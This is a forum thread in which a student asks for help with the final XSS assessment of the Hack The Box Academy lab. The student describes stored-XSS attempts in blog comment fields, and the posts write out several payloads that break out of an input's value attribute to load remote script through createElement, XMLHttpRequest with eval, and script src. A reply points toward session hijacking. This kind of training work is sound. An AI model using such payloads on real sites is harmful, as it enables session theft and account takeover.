Academy HTB - XSS module Final Assessment

Hello everyone!
I’m getting stuck with the Final Assessment of XSS modue on Academy HTB.

Apart that the target website does not store comments anymore, I don’t know why (I tried also to reset the machine but I get always the same target IP address), I approached the problem in the following way:

On the index page, at, I have one only search input. I tried to inject any XSS payload and I get a message like “Results for “”” so it is like it does not filter my input even if nothing is triggered.

Then, I moved to welcome-to-security-blog page, where I can see different input forms: Comment, Name, Email, Website.

Among these forms, Email form requires to have an email pattern, and Website form adds “http://” at the beginning of the text I inject, so I would exclude these two forms.

Analyzing Comment and Name form, I noted that they filter the inputs so I guess one of them should be vulnerable. My suspicious focuses more on Name where the filter deletes all contents between “<” and “>”, so my solution was to encode the “<” char as “<”. With this approach, when I publish (and check for store) the comment, the Name with my XSS injection text is entirely shown, and Name value is linked with Website form. Anyway, despite this, when I use payloads like alert() or src=http://myIP:PORT/script.js (by running a listener on PORT on my machine) I don’t get anything. Of course I tried this approach also for Comment form.

Is my current approach correct or am I totally wrong? Should I check also other kinds of tags?

Thank you in advance!

You are close. Review Session Hijacking, a few times.

@donthackme I’m focusing on the page source structure on “Name” field where the html piece of code is:

<p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="TEST" size="30" maxlength="245" required='required' /></p>

so the input text will be inserted in “value” variable. At this point, I tried to use onload event for executing javascript code by giving as input the following:
" onLoad="javascript:eval('var a=document.createElement(\'script\');a.src=\'\';document.body.appendChild(a)')
The HTML page source piece of value will be the following:

<SNIP...> value="&quot; onload=&quot;javascript:eval(&#039;var a=document.createElement(\&#039;script\&#039;);a.src=\&#039;\&#039;;document.body.appendChild(a)&#039;)" size="30" maxlength="245" required='required' /></p>

but on my listener I don’t get anything.

I tried another approach by thinking: ok, not only “Name” field but also “Website” field can be stored so I can store a script tag content in “Website” field and call the related function in “Name” field, so in “Name” I typed: " onload="b() while in “Website” I typed &quot;/&gt;&lt;script&gt;function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);"GET", "//");a.send();&lt;/script&gt; but also in this case with no luck.

I also tried simply on “Name” field the following ">&lt;script+src=;&lt;/script&gt; but in this case the main issue I see is the structure of resulting HTML piece of code:

<SNIP...> value="&quot;/&gt;&lt;script+src=;&lt;/script&gt;" size="30" maxlength="245" required='required' /></p>

so here I close immediately the value variable and <input> tag with a "/> (&quot;/&gt;) and then I inject my script tag. Here my main doubt is: when I close (&lt;/script&gt;) I still have a remaining code of the <input> tag (size, maxlength, required variables). How can I “remove” it? I tried to comment by <!-- (&lt;&#x21;&#x2D;&#x2D;) but does not work (also because I guess it could comment all the remaining html code of the page). I tried to manage this doubt also by declaring a second <input> tag after my </script> tag by typing the following code in “Name” field:


in order to concatenate correctly the remaining size, maxlength and required variables of <input> tag, but also in this case with no luck.
I’m feeling so stupid…

Solved… my “error” was so stupid…

hey how are you?how did you solve that?can u explain please?

just discard all my analysis here and use port 8080 as listening port on attacker machine. Then you need only to review Session Hijacking section as suggested by @donthackme